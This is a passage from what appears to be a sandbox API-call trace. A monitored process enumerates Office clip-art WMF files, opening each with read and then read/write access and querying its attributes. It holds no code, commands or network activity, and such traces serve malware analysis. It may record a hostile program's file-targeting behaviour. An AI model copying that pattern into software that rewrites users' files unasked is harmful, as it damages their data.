lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0103.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0103.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.519] AreFileApisANSI () returned 1 [0103.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0103.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.520] AreFileApisANSI () returned 1 [0103.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0103.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 69 [0103.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.520] GetFileType (hFile=0x33c) returned 0x1 [0103.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0103.520] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.520] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.520] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.521] CloseHandle (hObject=0x33c) returned 1 [0103.521] AreFileApisANSI () returned 1 [0103.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0103.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 69 [0103.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.521] GetFileType (hFile=0x33c) returned 0x1 [0103.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0103.521] CloseHandle (hObject=0x33c) returned 1 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.522] AreFileApisANSI () returned 1 [0103.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0103.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 69 [0103.523] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaac)) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0103.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.523] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c08, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS01603_.WMF", cAlternateFileName="")) returned 1 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0103.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0103.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.524] AreFileApisANSI () returned 1 [0103.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0103.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.524] AreFileApisANSI () returned 1 [0103.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0103.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 69 [0103.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.525] GetFileType (hFile=0x33c) returned 0x1 [0103.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0103.525] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.525] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.525] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.526] CloseHandle (hObject=0x33c) returned 1 [0103.526] AreFileApisANSI () returned 1 [0103.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0103.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 69 [0103.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.526] GetFileType (hFile=0x33c) returned 0x1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0103.527] CloseHandle (hObject=0x33c) returned 1 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.528] AreFileApisANSI () returned 1 [0103.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0103.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 69 [0103.528] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c08)) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0103.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.528] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, 